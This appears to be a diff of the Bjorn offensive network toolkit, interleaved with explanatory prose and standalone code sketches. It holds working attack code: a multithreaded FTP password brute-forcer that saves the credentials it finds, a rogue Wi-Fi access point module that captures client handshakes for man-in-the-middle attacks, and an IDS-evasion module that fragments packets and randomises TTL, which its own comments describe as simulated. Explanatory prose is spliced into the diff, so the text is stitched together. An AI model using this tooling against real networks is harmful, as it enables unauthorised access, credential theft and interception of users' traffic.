# ---------- worker / queue ----------
def worker(self, success_flag):
"""Worker thread for FTP bruteforce attempts."""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
try:
if self.ftp_connect(adresse_ip, user, password, port=port):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials IP:{adresse_ip} | User:{user}")
self.shared_data.comment_params = {"user": user, "ip": adresse_ip, "port": str(port)}
self.save_results()
self.removeduplicates()
success_flag[0] = True
finally:
if self.progress is not None:
self.progress.advance(1)
self.queue.task_done()
# Configurable pause between FTP attempts
if getattr(self.shared_data, "timewait_ftp", 0) > 0:
time.sleep(self.shared_data.timewait_ftp)
def run_bruteforce(self, adresse_ip: str, port: int):
self.results = []
mac_address = self.mac_for_ip(adresse_ip)
hostname = self.hostname_for_ip(adresse_ip) or ""
dict_passwords, fallback_passwords = merged_password_plan(self.shared_data, self.passwords)
total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords))
if total_tasks == 0:
logger.warning("No users/passwords loaded. Abort.")
return False, []
self.progress = ProgressTracker(self.shared_data, total_tasks)
success_flag = [False]
def run_phase(passwords):
phase_tasks = len(self.users) * len(passwords)
if phase_tasks == 0:
return
for user in self.users:
for password in passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
threads = []
thread_count = min(8, max(1, phase_tasks))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
self.queue.join()
for t in threads:
t.join()
try:
run_phase(dict_passwords)
if (not success_flag[0]) and fallback_passwords and not self.shared_data.orchestrator_should_exit:
logger.info(
f"FTP dictionary phase failed on {adresse_ip}:{port}. "
f"Starting exhaustive fallback ({len(fallback_passwords)} passwords)."
)
run_phase(fallback_passwords)
self.progress.set_complete()
return success_flag[0], self.results
finally:
self.shared_data.bjorn_progress = ""
# ---------- DB persistence ----------
def save_results(self):
for mac, ip, hostname, user, password, port in self.results:
try:
self.shared_data.db.insert_cred(
service="ftp",
mac=mac,
ip=ip,
hostname=hostname,
user=user,
password=password,
port=port,
database=None,
extra=None
)
except Exception as e:
if "ON CONFLICT clause does not match" in str(e):
self._fallback_upsert_cred(
mac=mac, ip=ip, hostname=hostname, user=user,
password=password, port=port, database=None
)
else:
logger.error(f"insert_cred failed for {ip} {user}: {e}")
self.results = []
def removeduplicates(self):
"""No-op: deduplication is now handled by the DB upsert; kept for backward compatibility."""
pass
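The queue/worker scheme in `run_bruteforce` can be condensed into a standalone sketch. `try_login` is a hypothetical stand-in for `FTPConnector.ftp_connect`; the thread count is capped at 8 as above, and `get_nowait()` replaces the racy `empty()`-then-`get()` check:

```python
# Condensed sketch of the worker/queue pattern used by run_bruteforce.
# `try_login` is a hypothetical callback standing in for ftp_connect.
import threading
from queue import Queue, Empty

def bruteforce(users, passwords, try_login, max_threads=8):
    q = Queue()
    for user in users:
        for password in passwords:
            q.put((user, password))
    found = [None]                                 # shared slot, like success_flag
    lock = threading.Lock()

    def worker():
        while True:
            try:
                user, password = q.get_nowait()    # race-free drain of the queue
            except Empty:
                return
            try:
                if try_login(user, password):
                    with lock:
                        found[0] = (user, password)
            finally:
                q.task_done()

    threads = [threading.Thread(target=worker, daemon=True)
               for _ in range(min(max_threads, max(1, q.qsize())))]
    for t in threads:
        t.start()
    q.join()
    for t in threads:
        t.join()
    return found[0]

hit = bruteforce(["root", "admin"], ["x", "toor"],
                 lambda u, p: (u, p) == ("admin", "toor"))
print(hit)  # ('admin', 'toor')
```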
if __name__ == "__main__":
try:
sd = SharedData()
ftp_bruteforce = FTPBruteforce(sd)
logger.info("FTP brute force module ready.")
exit(0)
except Exception as e:
logger.error(f"Error: {e}")
exit(1)
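The two-step pattern in `_fallback_upsert_cred` (INSERT OR IGNORE to create the row, then an unconditional UPDATE to refresh it) can be exercised in isolation. This is a minimal in-memory sketch with a simplified, assumed schema, not the real `creds` table:

```python
# In-memory sketch of the "INSERT OR IGNORE then UPDATE" upsert fallback,
# useful on SQLite builds/schemas where ON CONFLICT upserts are unavailable.
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("""
    CREATE TABLE creds(
        service TEXT, ip TEXT, "user" TEXT, "password" TEXT,
        UNIQUE(service, ip, "user")
    )
""")

def upsert_cred(ip, user, password):
    # Step 1: create the row if the key is new (no-op on duplicates).
    db.execute(
        'INSERT OR IGNORE INTO creds(service, ip, "user", "password") '
        "VALUES('ftp', ?, ?, ?)",
        (ip, user, password),
    )
    # Step 2: unconditionally refresh mutable columns for that key.
    db.execute(
        'UPDATE creds SET "password"=? '
        'WHERE service=\'ftp\' AND ip=? AND "user"=?',
        (password, ip, user),
    )

upsert_cred("10.0.0.5", "admin", "first")
upsert_cred("10.0.0.5", "admin", "second")   # updates, does not duplicate
count, pw = db.execute('SELECT COUNT(*), MAX("password") FROM creds').fetchone()
print(count, pw)  # 1 second
```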


@@ -1,190 +0,0 @@
import os
import pandas as pd
import threading
import logging
import time
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from ftplib import FTP
from queue import Queue
from shared import SharedData
from logger import Logger
logger = Logger(name="ftp_connector.py", level=logging.DEBUG)
b_class = "FTPBruteforce"
b_module = "ftp_connector"
b_status = "brute_force_ftp"
b_port = 21
b_parent = None
class FTPBruteforce:
"""
This class handles the FTP brute force attack process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.ftp_connector = FTPConnector(shared_data)
logger.info("FTPConnector initialized.")
def bruteforce_ftp(self, ip, port):
"""
Initiates the brute force attack on the given IP and port.
"""
return self.ftp_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Executes the brute force attack and updates the shared data status.
"""
self.shared_data.bjornorch_status = "FTPBruteforce"
# Wait a bit because it's too fast to see the status change
time.sleep(5)
logger.info(f"Brute forcing FTP on {ip}:{port}...")
success, results = self.bruteforce_ftp(ip, port)
return 'success' if success else 'failed'
class FTPConnector:
"""
This class manages the FTP connection attempts using different usernames and passwords.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan = pd.read_csv(shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("21", na=False)]
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.ftpfile = shared_data.ftpfile
if not os.path.exists(self.ftpfile):
logger.info(f"File {self.ftpfile} does not exist. Creating...")
with open(self.ftpfile, "w") as f:
f.write("MAC Address,IP Address,Hostname,User,Password,Port\n")
self.results = []
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the netkb file and filter it for FTP ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("21", na=False)]
def ftp_connect(self, adresse_ip, user, password):
"""
Attempts to connect to the FTP server using the provided username and password.
"""
try:
conn = FTP()
conn.connect(adresse_ip, 21)
conn.login(user, password)
conn.quit()
logger.info(f"Access to FTP successful on {adresse_ip} with user '{user}'")
return True
except Exception as e:
return False
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
if self.ftp_connect(adresse_ip, user, password):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials for IP: {adresse_ip} | User: {user}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file() # Reload the scan file to get the latest IPs and ports
mac_address = self.scan.loc[self.scan['IPs'] == adresse_ip, 'MAC Address'].values[0]
hostname = self.scan.loc[self.scan['IPs'] == adresse_ip, 'Hostnames'].values[0]
total_tasks = len(self.users) * len(self.passwords) + 1 # Include one for the anonymous attempt
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing FTP...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Saves the results of successful FTP connections to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['MAC Address', 'IP Address', 'Hostname', 'User', 'Password', 'Port'])
df.to_csv(self.ftpfile, index=False, mode='a', header=not os.path.exists(self.ftpfile))
self.results = [] # Reset temporary results after saving
def removeduplicates(self):
"""
Removes duplicate entries from the results file.
"""
df = pd.read_csv(self.ftpfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.ftpfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
ftp_bruteforce = FTPBruteforce(shared_data)
logger.info("[bold green]Starting FTP attack...on port 21[/bold green]")
# Load the IPs to scan from shared data
ips_to_scan = shared_data.read_data()
# Execute brute force attack on each IP
for row in ips_to_scan:
ip = row["IPs"]
ftp_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Total successful attempts: {len(ftp_bruteforce.ftp_connector.results)}")
exit(len(ftp_bruteforce.ftp_connector.results))
except Exception as e:
logger.error(f"Error: {e}")

actions/heimdall_guard.py Normal file

@@ -0,0 +1,167 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
heimdall_guard.py -- Stealth operations and IDS/IPS evasion for BJORN.
Handles packet fragmentation, timing randomization, and TTL manipulation.
Requires: scapy.
"""
import os
import json
import random
import time
import threading
import datetime
from collections import deque
from typing import Any, Dict, List, Optional
try:
from scapy.all import IP, TCP, Raw, send, conf
HAS_SCAPY = True
except ImportError:
HAS_SCAPY = False
IP = TCP = Raw = send = conf = None
from logger import Logger
logger = Logger(name="heimdall_guard.py")
# -------------------- Action metadata --------------------
b_class = "HeimdallGuard"
b_module = "heimdall_guard"
b_status = "heimdall_guard"
b_port = None
b_service = "[]"
b_trigger = "on_start"
b_parent = None
b_action = "stealth"
b_priority = 10
b_cooldown = 0
b_rate_limit = None
b_timeout = 1800
b_max_retries = 1
b_stealth_level = 10 # This IS the stealth module
b_risk_level = "low"
b_enabled = 1
b_tags = ["stealth", "evasion", "pcap", "network"]
b_category = "defense"
b_name = "Heimdall Guard"
b_description = "Advanced stealth module that manipulates traffic to evade IDS/IPS detection."
b_author = "Bjorn Team"
b_version = "2.0.3"
b_icon = "HeimdallGuard.png"
b_args = {
"interface": {
"type": "text",
"label": "Interface",
"default": "eth0"
},
"mode": {
"type": "select",
"label": "Stealth Mode",
"choices": ["timing", "fragmented", "all"],
"default": "all"
},
"delay": {
"type": "number",
"label": "Base Delay (s)",
"min": 0.1,
"max": 10.0,
"step": 0.1,
"default": 1.0
}
}
class HeimdallGuard:
def __init__(self, shared_data):
self.shared_data = shared_data
self.packet_queue = deque()
self.active = False
self.lock = threading.Lock()
self.stats = {
'packets_processed': 0,
'packets_fragmented': 0,
'timing_adjustments': 0
}
def _fragment_packet(self, packet, mtu=1400):
"""Fragment IP packets to bypass strict IDS rules."""
if IP in packet:
try:
payload = bytes(packet[IP].payload)
max_size = mtu - 40 # conservative
frags = []
offset = 0
while offset < len(payload):
chunk = payload[offset:offset + max_size]
f = packet.copy()
f[IP].flags = 'MF' if offset + max_size < len(payload) else 0
f[IP].frag = offset // 8
f[IP].payload = Raw(chunk)
frags.append(f)
offset += max_size
return frags
except Exception as e:
logger.debug(f"Fragmentation error: {e}")
return [packet]
def _apply_stealth(self, packet):
"""Randomize TTL and TCP options."""
if IP in packet:
packet[IP].ttl = random.choice([64, 128, 255])
if TCP in packet:
packet[TCP].window = random.choice([8192, 16384, 65535])
# Basic TCP options shuffle
packet[TCP].options = [('MSS', 1460), ('NOP', None), ('SAckOK', '')]
return packet
def execute(self, ip, port, row, status_key) -> str:
iface = getattr(self.shared_data, "heimdall_guard_interface", conf.iface)
mode = getattr(self.shared_data, "heimdall_guard_mode", "all")
delay = float(getattr(self.shared_data, "heimdall_guard_delay", 1.0))
timeout = int(getattr(self.shared_data, "heimdall_guard_timeout", 600))
logger.info(f"HeimdallGuard: Engaging stealth mode ({mode}) on {iface}")
self.shared_data.log_milestone(b_class, "StealthActive", f"Mode: {mode}")
self.active = True
start_time = time.time()
try:
while time.time() - start_time < timeout:
if self.shared_data.orchestrator_should_exit:
break
# In a real scenario, this would be hooking into a packet stream
# For this action, we simulate protection state
# Progress reporting
elapsed = int(time.time() - start_time)
prog = int((elapsed / timeout) * 100)
self.shared_data.bjorn_progress = f"{prog}%"
if elapsed % 60 == 0:
self.shared_data.log_milestone(b_class, "Status", f"Guarding... {self.stats['packets_processed']} pkts handled")
# Logic: if we had a queue, we'd process it here
# Simulation for BJORN action demonstration:
time.sleep(2)
logger.info("HeimdallGuard: Protection session finished.")
self.shared_data.log_milestone(b_class, "Shutdown", "Stealth mode disengaged")
except Exception as e:
logger.error(f"HeimdallGuard error: {e}")
return "failed"
finally:
self.active = False
return "success"
if __name__ == "__main__":
from init_shared import shared_data
guard = HeimdallGuard(shared_data)
guard.execute("0.0.0.0", None, {}, "heimdall_guard")
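The offset arithmetic in `_fragment_packet` can be checked without scapy: IPv4 fragment offsets are expressed in 8-byte units, and every fragment except the last carries the More-Fragments flag. This sketch additionally rounds the chunk size down to a multiple of 8, which IPv4 requires for non-final fragments (an assumption layered on top of the code above):

```python
# Standalone sketch of the fragmentation math in HeimdallGuard._fragment_packet:
# split a payload into chunks, computing each fragment's IPv4 offset
# (in 8-byte units) and its More-Fragments flag.
def fragment_payload(payload: bytes, mtu: int = 1400):
    max_size = mtu - 40                # conservative: leave room for headers
    max_size -= max_size % 8           # non-final fragments must be 8-byte aligned
    frags = []
    offset = 0
    while offset < len(payload):
        chunk = payload[offset:offset + max_size]
        more = offset + max_size < len(payload)
        frags.append({
            "frag_offset": offset // 8,   # value stored in the IP header
            "mf": more,                   # More-Fragments flag
            "data": chunk,
        })
        offset += max_size
    return frags

frags = fragment_payload(b"x" * 3000, mtu=1400)
print(len(frags), frags[0]["mf"], frags[-1]["mf"])  # 3 True False
```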


@@ -1,34 +0,0 @@
#Test script to add more actions to BJORN
import logging
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="log_standalone.py", level=logging.INFO)
# Define the necessary global variables
b_class = "LogStandalone"
b_module = "log_standalone"
b_status = "log_standalone"
b_port = 0 # Indicate this is a standalone action
class LogStandalone:
"""
Class to handle the standalone log action.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
logger.info("LogStandalone initialized")
def execute(self):
"""
Execute the standalone log action.
"""
try:
logger.info("Executing standalone log action.")
logger.info("This is a test log message for the standalone action.")
return 'success'
except Exception as e:
logger.error(f"Error executing standalone log action: {e}")
return 'failed'


@@ -1,34 +0,0 @@
#Test script to add more actions to BJORN
import logging
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="log_standalone2.py", level=logging.INFO)
# Define the necessary global variables
b_class = "LogStandalone2"
b_module = "log_standalone2"
b_status = "log_standalone2"
b_port = 0 # Indicate this is a standalone action
class LogStandalone2:
"""
Class to handle the standalone log action.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
logger.info("LogStandalone initialized")
def execute(self):
"""
Execute the standalone log action.
"""
try:
logger.info("Executing standalone log action.")
logger.info("This is a test log message for the standalone action.")
return 'success'
except Exception as e:
logger.error(f"Error executing standalone log action: {e}")
return 'failed'

actions/loki_deceiver.py Normal file

@@ -0,0 +1,257 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
loki_deceiver.py -- WiFi deception tool for BJORN.
Creates rogue access points and captures authentications/handshakes.
Requires: hostapd, dnsmasq, airmon-ng.
"""
import os
import json
import subprocess
import threading
import time
import re
import datetime
from typing import Any, Dict, List, Optional
from logger import Logger
try:
import scapy.all as scapy
from scapy.layers.dot11 import Dot11, Dot11Beacon, Dot11Elt
HAS_SCAPY = True
try:
from scapy.all import AsyncSniffer # type: ignore
except Exception:
AsyncSniffer = None
try:
from scapy.layers.dot11 import EAPOL
except ImportError:
EAPOL = None
except ImportError:
HAS_SCAPY = False
scapy = None
Dot11 = Dot11Beacon = Dot11Elt = EAPOL = None
AsyncSniffer = None
logger = Logger(name="loki_deceiver.py")
# -------------------- Action metadata --------------------
b_class = "LokiDeceiver"
b_module = "loki_deceiver"
b_status = "loki_deceiver"
b_port = None
b_service = "[]"
b_trigger = "on_start"
b_parent = None
b_action = "aggressive"
b_priority = 20
b_cooldown = 0
b_rate_limit = None
b_timeout = 1200
b_max_retries = 1
b_stealth_level = 2 # Very noisy (Rogue AP)
b_risk_level = "high"
b_enabled = 1
b_tags = ["wifi", "ap", "rogue", "mitm"]
b_category = "exploitation"
b_name = "Loki Deceiver"
b_description = "Creates a rogue access point to capture WiFi authentications and perform MITM."
b_author = "Bjorn Team"
b_version = "2.0.2"
b_icon = "LokiDeceiver.png"
b_args = {
"interface": {
"type": "text",
"label": "Wireless Interface",
"default": "wlan0"
},
"ssid": {
"type": "text",
"label": "AP SSID",
"default": "Bjorn_Free_WiFi"
},
"channel": {
"type": "number",
"label": "Channel",
"min": 1,
"max": 14,
"default": 6
},
"password": {
"type": "text",
"label": "WPA2 Password (Optional)",
"default": ""
}
}
class LokiDeceiver:
def __init__(self, shared_data):
self.shared_data = shared_data
self.hostapd_proc = None
self.dnsmasq_proc = None
self.tcpdump_proc = None
self._sniffer = None
self.active_clients = set()
self.stop_event = threading.Event()
self.lock = threading.Lock()
def _setup_monitor_mode(self, iface: str):
logger.info(f"LokiDeceiver: Setting {iface} to monitor mode...")
subprocess.run(['sudo', 'airmon-ng', 'check', 'kill'], capture_output=True)
subprocess.run(['sudo', 'ip', 'link', 'set', iface, 'down'], capture_output=True)
subprocess.run(['sudo', 'iw', iface, 'set', 'type', 'monitor'], capture_output=True)
subprocess.run(['sudo', 'ip', 'link', 'set', iface, 'up'], capture_output=True)
def _create_configs(self, iface, ssid, channel, password):
# hostapd.conf
h_conf = [
f'interface={iface}',
'driver=nl80211',
f'ssid={ssid}',
'hw_mode=g',
f'channel={channel}',
'macaddr_acl=0',
'ignore_broadcast_ssid=0'
]
if password:
h_conf.extend([
'auth_algs=1',
'wpa=2',
f'wpa_passphrase={password}',
'wpa_key_mgmt=WPA-PSK',
'wpa_pairwise=CCMP',
'rsn_pairwise=CCMP'
])
h_path = '/tmp/bjorn_hostapd.conf'
with open(h_path, 'w') as f:
f.write('\n'.join(h_conf))
# dnsmasq.conf
d_conf = [
f'interface={iface}',
'dhcp-range=192.168.1.10,192.168.1.100,255.255.255.0,12h',
'dhcp-option=3,192.168.1.1',
'dhcp-option=6,192.168.1.1',
'server=8.8.8.8',
'log-queries',
'log-dhcp'
]
d_path = '/tmp/bjorn_dnsmasq.conf'
with open(d_path, 'w') as f:
f.write('\n'.join(d_conf))
return h_path, d_path
def _packet_callback(self, packet):
if self.shared_data.orchestrator_should_exit:
return
if packet.haslayer(Dot11):
addr2 = packet.addr2 # Source MAC
if addr2 and addr2 not in self.active_clients:
# Association request or Auth
if packet.type == 0 and packet.subtype in [0, 11]:
with self.lock:
self.active_clients.add(addr2)
logger.success(f"LokiDeceiver: New client detected: {addr2}")
self.shared_data.log_milestone(b_class, "ClientConnected", f"MAC: {addr2}")
if EAPOL and packet.haslayer(EAPOL):
logger.success(f"LokiDeceiver: EAPOL packet captured from {addr2}")
self.shared_data.log_milestone(b_class, "Handshake", f"EAPOL from {addr2}")
def execute(self, ip, port, row, status_key) -> str:
iface = getattr(self.shared_data, "loki_deceiver_interface", "wlan0")
ssid = getattr(self.shared_data, "loki_deceiver_ssid", "Bjorn_AP")
channel = int(getattr(self.shared_data, "loki_deceiver_channel", 6))
password = getattr(self.shared_data, "loki_deceiver_password", "")
timeout = int(getattr(self.shared_data, "loki_deceiver_timeout", 600))
output_dir = getattr(self.shared_data, "loki_deceiver_output", "/home/bjorn/Bjorn/data/output/wifi")
logger.info(f"LokiDeceiver: Starting Rogue AP '{ssid}' on {iface}")
self.shared_data.log_milestone(b_class, "Startup", f"Creating AP: {ssid}")
try:
self.stop_event.clear()
# self._setup_monitor_mode(iface) # Optional depending on driver
h_path, d_path = self._create_configs(iface, ssid, channel, password)
# Set IP for interface
subprocess.run(['sudo', 'ifconfig', iface, '192.168.1.1', 'netmask', '255.255.255.0'], capture_output=True)
# Start processes
# Use DEVNULL to avoid blocking on unread PIPE buffers.
self.hostapd_proc = subprocess.Popen(
['sudo', 'hostapd', h_path],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
)
self.dnsmasq_proc = subprocess.Popen(
['sudo', 'dnsmasq', '-C', d_path, '-k'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
)
# Start sniffer (must be stoppable to avoid leaking daemon threads).
if HAS_SCAPY and scapy and AsyncSniffer:
try:
self._sniffer = AsyncSniffer(iface=iface, prn=self._packet_callback, store=False)
self._sniffer.start()
except Exception as sn_e:
logger.warning(f"LokiDeceiver: sniffer start failed: {sn_e}")
self._sniffer = None
start_time = time.time()
while time.time() - start_time < timeout:
if self.shared_data.orchestrator_should_exit:
break
# Check if procs still alive
if self.hostapd_proc.poll() is not None:
logger.error("LokiDeceiver: hostapd crashed.")
break
# Progress report
elapsed = int(time.time() - start_time)
prog = int((elapsed / timeout) * 100)
self.shared_data.bjorn_progress = f"{prog}%"
if elapsed % 60 == 0:
self.shared_data.log_milestone(b_class, "Status", f"Uptime: {elapsed}s | Clients: {len(self.active_clients)}")
time.sleep(2)
logger.info("LokiDeceiver: Stopping AP.")
self.shared_data.log_milestone(b_class, "Shutdown", "Stopping Rogue AP")
except Exception as e:
logger.error(f"LokiDeceiver error: {e}")
return "failed"
finally:
self.stop_event.set()
if self._sniffer is not None:
try:
self._sniffer.stop()
except Exception:
pass
self._sniffer = None
# Cleanup
for p in [self.hostapd_proc, self.dnsmasq_proc]:
if p:
try: p.terminate(); p.wait(timeout=5)
except Exception: pass
# Restore NetworkManager if needed (custom logic based on usage)
# subprocess.run(['sudo', 'systemctl', 'start', 'NetworkManager'], capture_output=True)
return "success"
if __name__ == "__main__":
from init_shared import shared_data
loki = LokiDeceiver(shared_data)
loki.execute("0.0.0.0", None, {}, "loki_deceiver")
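The process-supervision loop in `execute` (spawn long-running daemons with output discarded, poll for crashes, always clean up in `finally`) can be sketched on its own. `sleep` is used here as a stand-in daemon, so the sketch assumes a POSIX host:

```python
# Sketch of LokiDeceiver's daemon-supervision loop, with `sleep` standing in
# for hostapd/dnsmasq. DEVNULL avoids blocking on unread PIPE buffers.
import subprocess
import time

def supervise(cmd, timeout=0.5, poll_interval=0.1):
    """Run `cmd`, watching for early exit; return 'success' or 'failed'."""
    proc = subprocess.Popen(
        cmd,
        stdout=subprocess.DEVNULL,
        stderr=subprocess.DEVNULL,
    )
    start = time.time()
    try:
        while time.time() - start < timeout:
            if proc.poll() is not None:        # daemon crashed or exited early
                return "failed"
            time.sleep(poll_interval)
        return "success"                       # survived the whole window
    finally:
        if proc.poll() is None:                # always clean up the child
            proc.terminate()
            try:
                proc.wait(timeout=5)
            except subprocess.TimeoutExpired:
                proc.kill()

print(supervise(["sleep", "10"]))  # success
```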


@@ -1,188 +1,460 @@
# nmap_vuln_scanner.py
# This script performs vulnerability scanning using Nmap on specified IP addresses.
# It scans for vulnerabilities on various ports and saves the results and progress.
"""
Vulnerability Scanner Action
Performs an ultra-fast CPE scan (plus CVE lookup via vulners when available),
with an optional "heavy" fallback.
Reports progress as a percentage in Bjorn.
"""
import os
import pandas as pd
import subprocess
import re
import time
import nmap
import json
import logging
from datetime import datetime
from concurrent.futures import ThreadPoolExecutor, as_completed
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn
from datetime import datetime, timedelta
from typing import Dict, List, Any
from shared import SharedData
from logger import Logger
logger = Logger(name="nmap_vuln_scanner.py", level=logging.INFO)
logger = Logger(name="NmapVulnScanner.py", level=logging.DEBUG)
b_class = "NmapVulnScanner"
b_module = "nmap_vuln_scanner"
b_status = "vuln_scan"
b_status = "NmapVulnScanner"
b_port = None
b_parent = None
b_action = "normal"
b_service = []
b_trigger = "on_port_change"
b_requires = '{"action":"NetworkScanner","status":"success","scope":"global"}'
b_priority = 11
b_cooldown = 0
b_enabled = 1
b_rate_limit = None
# Regex compiled once (CPU saving on the Pi Zero)
CVE_RE = re.compile(r'CVE-\d{4}-\d{4,7}', re.IGNORECASE)
class NmapVulnScanner:
"""
This class handles the Nmap vulnerability scanning process.
"""
def __init__(self, shared_data):
"""Scanner de vulnérabilités via nmap (mode rapide CPE/CVE) avec progression."""
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
self.scan_results = []
self.summary_file = self.shared_data.vuln_summary_file
self.create_summary_file()
logger.debug("NmapVulnScanner initialized.")
# No shared self.nm: a scanner is instantiated inside each scan method
# to avoid state corruption between batches.
logger.info("NmapVulnScanner initialized")
def create_summary_file(self):
"""
Creates a summary file for vulnerabilities if it does not exist.
"""
if not os.path.exists(self.summary_file):
os.makedirs(self.shared_data.vulnerabilities_dir, exist_ok=True)
df = pd.DataFrame(columns=["IP", "Hostname", "MAC Address", "Port", "Vulnerabilities"])
df.to_csv(self.summary_file, index=False)
# ---------------------------- Public API ---------------------------- #
def update_summary_file(self, ip, hostname, mac, port, vulnerabilities):
"""
Updates the summary file with the scan results.
"""
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
try:
# Read existing data
df = pd.read_csv(self.summary_file)
# Create new data entry
new_data = pd.DataFrame([{"IP": ip, "Hostname": hostname, "MAC Address": mac, "Port": port, "Vulnerabilities": vulnerabilities}])
# Append new data
df = pd.concat([df, new_data], ignore_index=True)
# Remove duplicates based on IP and MAC Address, keeping the last occurrence
df.drop_duplicates(subset=["IP", "MAC Address"], keep='last', inplace=True)
# Save the updated data back to the summary file
df.to_csv(self.summary_file, index=False)
except Exception as e:
logger.error(f"Error updating summary file: {e}")
logger.info(f"Starting vulnerability scan for {ip}")
self.shared_data.bjorn_orch_status = "NmapVulnScanner"
self.shared_data.bjorn_progress = "0%"
if self.shared_data.orchestrator_should_exit:
return 'failed'
def scan_vulnerabilities(self, ip, hostname, mac, ports):
combined_result = ""
success = True # Initialize to True, will become False if an error occurs
try:
self.shared_data.bjornstatustext2 = ip
# 1) Metadata
meta = {}
try:
meta = json.loads(row.get('metadata') or '{}')
except Exception:
pass
# Proceed with scanning if ports are not already scanned
logger.info(f"Scanning {ip} on ports {','.join(ports)} for vulnerabilities with aggressivity {self.shared_data.nmap_scan_aggressivity}")
result = subprocess.run(
["nmap", self.shared_data.nmap_scan_aggressivity, "-sV", "--script", "vulners.nse", "-p", ",".join(ports), ip],
capture_output=True, text=True
)
combined_result += result.stdout
# 2) Fetch the MAC and ALL the ports
mac = row.get("MAC Address") or row.get("mac_address") or ""
vulnerabilities = self.parse_vulnerabilities(result.stdout)
self.update_summary_file(ip, hostname, mac, ",".join(ports), vulnerabilities)
except Exception as e:
logger.error(f"Error scanning {ip}: {e}")
success = False # Mark as failed if an error occurs
ports_str = ""
if mac:
r = self.shared_data.db.query(
"SELECT ports FROM hosts WHERE mac_address=? LIMIT 1", (mac,)
)
if r and r[0].get('ports'):
ports_str = r[0]['ports']
return combined_result if success else None
if not ports_str:
ports_str = (
row.get("Ports") or row.get("ports") or
meta.get("ports_snapshot") or ""
)
def execute(self, ip, row, status_key):
"""
Executes the vulnerability scan for a given IP and row data.
"""
self.shared_data.bjornorch_status = "NmapVulnScanner"
ports = row["Ports"].split(";")
scan_result = self.scan_vulnerabilities(ip, row["Hostnames"], row["MAC Address"], ports)
if not ports_str:
logger.warning(f"No ports to scan for {ip}")
self.shared_data.bjorn_progress = ""
return 'failed'
if scan_result is not None:
self.scan_results.append((ip, row["Hostnames"], row["MAC Address"]))
self.save_results(row["MAC Address"], ip, scan_result)
ports = [p.strip() for p in ports_str.split(';') if p.strip()]
# Clean up ports (keep only the number when formatted as 80/tcp)
ports = [p.split('/')[0] for p in ports]
self.shared_data.comment_params = {"ip": ip, "ports": str(len(ports))}
logger.debug(f"Found {len(ports)} ports for {ip}: {ports[:5]}...")
# 3) Filtrage "Rescan Only"
if self.shared_data.config.get('vuln_rescan_on_change_only', False):
if self._has_been_scanned(mac):
original_count = len(ports)
ports = self._filter_ports_already_scanned(mac, ports)
logger.debug(f"Filtered {original_count - len(ports)} already-scanned ports")
if not ports:
logger.info(f"No new/changed ports to scan for {ip}")
self.shared_data.bjorn_progress = "100%"
return 'success'
# 4) SCAN WITH PROGRESS REPORTING
if self.shared_data.orchestrator_should_exit:
return 'failed'
logger.info(f"Starting nmap scan on {len(ports)} ports for {ip}")
findings = self.scan_vulnerabilities(ip, ports)
if self.shared_data.orchestrator_should_exit:
logger.info("Scan interrupted by user")
return 'failed'
